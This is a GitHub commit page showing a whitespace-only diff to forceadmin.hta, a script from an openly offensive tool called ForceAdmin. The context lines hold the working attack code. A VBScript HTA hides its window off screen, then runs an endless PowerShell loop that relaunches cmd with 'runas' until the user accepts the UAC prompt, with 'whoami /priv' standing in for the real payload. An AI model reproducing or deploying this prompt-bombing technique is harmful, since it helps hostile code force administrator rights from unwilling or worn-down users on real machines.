Skip to content

Commit

Permalink
Update forceadmin.hta
Browse files Browse the repository at this point in the history
  • Loading branch information
Chainski authored Aug 9, 2024
1 parent 9961432 commit b013706
Showing 1 changed file with 2 additions and 2 deletions.
4 changes: 2 additions & 2 deletions forceadmin.hta
Original file line number Diff line number Diff line change
Expand Up @@ -3,7 +3,7 @@
<!-- https://github.com/Chainski/ForceAdmin -->
<script language="VBScript">
Window.ReSizeTo 0, 0
Window.MoveTo -4000, -4000
Window.MoveTo -4000, -4000
Dim ForceAdmin
Set ForceAdmin = CreateObject("WScript.Shell")
elevate="powershell -command ""while($true){try{Start-Process 'cmd' -Verb runas -ArgumentList '/k whoami /priv';exit}catch{}}"""
Expand All @@ -12,4 +12,4 @@
</script>
<body>
</body>
</html>
</html>

0 comments on commit b013706

Please sign in to comment.